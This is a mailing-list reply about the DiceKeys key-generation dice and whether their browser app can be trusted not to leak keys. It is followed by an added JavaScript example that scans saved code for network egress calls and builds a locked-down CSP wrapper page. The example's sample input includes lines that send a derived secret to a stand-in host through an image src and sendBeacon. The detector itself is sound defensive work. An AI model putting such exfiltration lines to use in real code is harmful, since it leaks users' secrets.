[GTALUG] Dice Keys

Lennart Sorensen lsorense at csclub.uwaterloo.ca
Sun Aug 30 16:19:14 EDT 2020


On Fri, Aug 28, 2020 at 11:15:00AM -0400, Christopher Browne via talk wrote:
> Here's a cool thing I saw recently...
> 
> https://www.schneier.com/blog/archives/2020/08/dicekeys.html

The comments are certainly fun to read.

> The intention of this parallels the various Bitcoin "Solid Steel Passphrase
> Wallet" items that were popular a year or so ago
> (See https://www.toughgadget.com/bitcoin-crypto-metal-recovery-seed-wallets/,
> https://www.buybitcoinworldwide.com/wallets/steel/ )
> 
> It's a case for a set of 25 dice that looks like a Boggle game set; it will
> generate and "record" what ought to be a Sooper Seekrut key as would be
> used for things like:
>  - master key for password manager
>  - U2F key for 2 Factor Authentication
>  - Secret key for cryptocurrency wallet
> 
> By being a set of dice with a nice plastic box to hold them securely, this
> is not vulnerable to various threats common to electronic devices:
>  - EMP (for those highly worried about nuclear devices)
>  - Water damage
> 
> Of course, if all your disk drives get toasted, there might not be any data
> left to decrypt or systems to connect to.  And plastic will melt away or
> burn when exposed to fire...
> 
> But it's pretty cool, I'm tempted to grab a set.
> 
> There's a web app: https://dicekeys.app/
> 
> It appears that this application, embedded in a single JavaScript file,
> runs locally, inside your browser, so that usual criticisms about it being
> a giant security vulnerability of sharing your key with their web site
> seem like they mightn't apply.  How to confirm in an authoritative way that
> nothing is *actually* shared seems like the fun security question.

I guess if you load the page, go offline, do the thing, close the browser,
wipe any caches and other things from it, then maybe you could trust it?
Or save a copy locally, read all the code and only run your verified
local copy?

-- 
Len Sorensen
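
An added example, not part of the original message and not code from dicekeys.app: one way to support the "save a copy locally, read all the code" approach is to list the places in the saved script that can send data out, then load the copy under a Content-Security-Policy that refuses network access. The file name `app.js`, the assumption that the copy is served from a local web server, and the sample script are all hypothetical.

```javascript
// Browser APIs that can send data off the machine or pull in more code.
const EGRESS_PATTERNS = [
  ["fetch", /\bfetch\s*\(/],
  ["XMLHttpRequest", /\bXMLHttpRequest\b/],
  ["WebSocket", /\bWebSocket\b/],
  ["EventSource", /\bEventSource\b/],
  ["sendBeacon", /\bsendBeacon\s*\(/],
  ["RTCPeerConnection", /\bRTCPeerConnection\b/],
  ["dynamic import", /\bimport\s*\(/],
  ["importScripts", /\bimportScripts\s*\(/],
  ["element .src assignment", /\.src\s*=[^=]/],
  ["location change", /\blocation(\.href)?\s*=[^=]/],
];

// One finding per (line, API): a reading list for the reviewer, not a proof.
// Minified or obfuscated code can reach these APIs without naming them.
function findEgressSinks(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const [api, re] of EGRESS_PATTERNS) {
      if (re.test(text)) findings.push({ line: i + 1, api, text: text.trim() });
    }
  });
  return findings;
}

// Wrapper page for the saved script. With this policy the browser itself refuses
// fetch/XHR/WebSocket/sendBeacon, images, frames and form posts. It does not
// stop top-level navigation, so "location change" findings still need reading.
function lockedDownPage(scriptFile) {
  const csp = "default-src 'none'; script-src 'self'; style-src 'self'; form-action 'none'";
  return [
    "<!doctype html>",
    `<meta http-equiv="Content-Security-Policy" content="${csp}">`,
    `<script src="${scriptFile}"></script>`,
  ].join("\n");
}

// Constructed sample input, not taken from any real application.
const SAMPLE = [
  "function deriveSecret(seed) { return seed.split('').reverse().join(''); }",
  "const img = new Image();",
  "img.src = 'https://telemetry.example/p?k=' + deriveSecret('abc');",
  "navigator.sendBeacon('https://telemetry.example/b', deriveSecret('abc'));",
].join("\n");

for (const f of findEgressSinks(SAMPLE)) console.log(`${f.line}: [${f.api}] ${f.text}`);
console.log(lockedDownPage("app.js"));
```

To scan a real saved copy, pass the file's text to `findEgressSinks`; an app that needs inline scripts or WebAssembly would need the policy loosened accordingly.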

